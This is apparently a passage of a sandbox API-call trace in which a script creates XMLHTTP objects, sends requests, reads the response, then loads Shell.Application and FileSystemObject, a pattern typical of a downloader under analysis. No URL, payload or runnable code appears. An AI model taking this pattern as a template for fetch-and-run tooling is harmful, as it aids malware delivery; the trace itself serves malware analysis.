	[0386.193] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.193] longjmp () 
	[0386.193] longjmp () 
	[0386.193] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.193] SysStringLen (param_1=0x0) returned 0x0
	[0386.193] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.193] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0386.193] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.193] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0386.194] ??2@YAPEAX_K@Z () returned 0x62f310
	[0386.194] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0386.194] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.194] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0386.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0386.194] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0386.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.194] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.194] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0386.194] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0386.425] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0386.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0386.426] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0386.426] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0386.426] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0386.426] SysStringLen (param_1=0x0) returned 0x0
	[0386.426] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0386.426] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0386.426] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0386.426] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0386.426] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0386.426] ??2@YAPEAX_K@Z () returned 0x62f350
	[0386.426] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0386.426] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0386.427] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0386.427] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0386.427] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0386.427] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0386.427] SysStringLen (param_1=0x0) returned 0x0
	[0386.427] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0386.429] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0386.429] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0386.429] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0386.429] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0386.429] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0386.429] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0386.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0386.823] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0386.823] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0386.825] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.825] SysStringLen (param_1=0x0) returned 0x0
	[0386.825] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.825] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.825] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74e0) returned 0x0
	[0386.825] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.825] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0386.825] ??2@YAPEAX_K@Z () returned 0x62f310
	[0386.825] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0386.825] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.825] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0386.825] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74e0) returned 0x0
	[0386.825] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74e0) returned 0x3
	[0386.826] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.826] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.828] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.828] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.828] SysStringLen (param_1=0x0) returned 0x0
	[0386.828] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.829] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.829] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0386.829] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.829] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0386.829] ??2@YAPEAX_K@Z () returned 0x62f330
	[0386.829] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0386.829] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.829] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0386.829] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0386.829] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0386.829] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0386.829] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0386.829] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0386.829] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0386.830] SysStringLen (param_1=0x0) returned 0x0
	[0386.830] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0386.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0386.830] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0386.830] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0386.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c58) returned 0x0
	[0386.830] ??2@YAPEAX_K@Z () returned 0x62f310
	[0386.830] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c58, pUnkSite=0x62f310) 
	[0386.830] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0386.830] XMLHTTPRequest:IUnknown:Release (This=0x49c5c58) returned 0x0
	[0386.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0386.830] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0386.830] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
